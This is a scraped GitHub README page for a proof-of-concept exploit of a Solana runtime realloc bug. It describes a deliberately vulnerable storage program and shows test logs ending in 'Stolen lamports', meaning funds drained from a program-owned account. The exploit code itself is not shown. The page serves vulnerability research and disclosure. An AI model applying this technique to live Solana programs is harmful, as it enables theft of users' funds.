Solana realloc bug exploit POC

Based on the comprehensive report from osec

https://twitter.com/osec_io/status/1601371947794804737

The rekt cloud program is a naive program which allows storage of arbitrary data, the first 32 bytes are used to the store the authority allowed to write or resize the storage.

It allows batching actions, which is essential to exit the instruction while still satisfying the runtime checks.

It makes it a simple to understand candidate to try to leverage the flaw and exploit it. Ensuring rent exemption is left to the user to simplify the program.

Somehow test have to be run in the root with BPF_OUT_DIR=$(pwd)/target/deploy cargo test-bpf -- --nocapture otherwise it loads the native runtime which is badly broken

Manipulate lamport fields to steal lamports from an unexpected program owned account

programs/rekt-cloud/tests/test_rekt.rs

[2022-12-11T05:33:09.931917557Z DEBUG solana_runtime::message_processor::stable_log] Program log: Welcome to Rekt cloud
...
[2022-12-11T05:33:09.989084403Z DEBUG solana_runtime::message_processor::stable_log] Program log: Initializing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.992174651Z DEBUG solana_runtime::message_processor::stable_log] Program log: Resizing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.995091090Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing to G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.996112170Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing at 10384, original data: [0, 196, 230, 158, 1, 0, 0, 0]
[2022-12-11T05:33:09.998725147Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing to G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.999703979Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing at 1020720, original data: [0, 0, 0, 0, 0, 0, 0, 0]
[2022-12-11T05:33:10.002209378Z DEBUG solana_runtime::message_processor::stable_log] Program log: Resizing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:10.002296729Z DEBUG solana_runtime::message_processor::stable_log] Program log: See you later!
...
Stolen lamports: 6960890880

Manipulate program owned account data

TODO

Remote code execution

Not possible

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
programs/rekt-cloud		programs/rekt-cloud
.gitignore		.gitignore
Cargo.lock		Cargo.lock
Cargo.toml		Cargo.toml
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

programs/rekt-cloud

programs/rekt-cloud

.gitignore

.gitignore

Cargo.lock

Cargo.lock

Cargo.toml

Cargo.toml

README.md

README.md

Repository files navigation

Solana realloc bug exploit POC

Manipulate lamport fields to steal lamports from an unexpected program owned account

Manipulate program owned account data

Remote code execution

About

Releases

Packages

Languages

Arrowana/realloc-bug-exploit-poc

Folders and files

Latest commit

History

Repository files navigation

Solana realloc bug exploit POC

Manipulate lamport fields to steal lamports from an unexpected program owned account

Manipulate program owned account data

Remote code execution

About

Resources

Stars

Watchers

Forks

Languages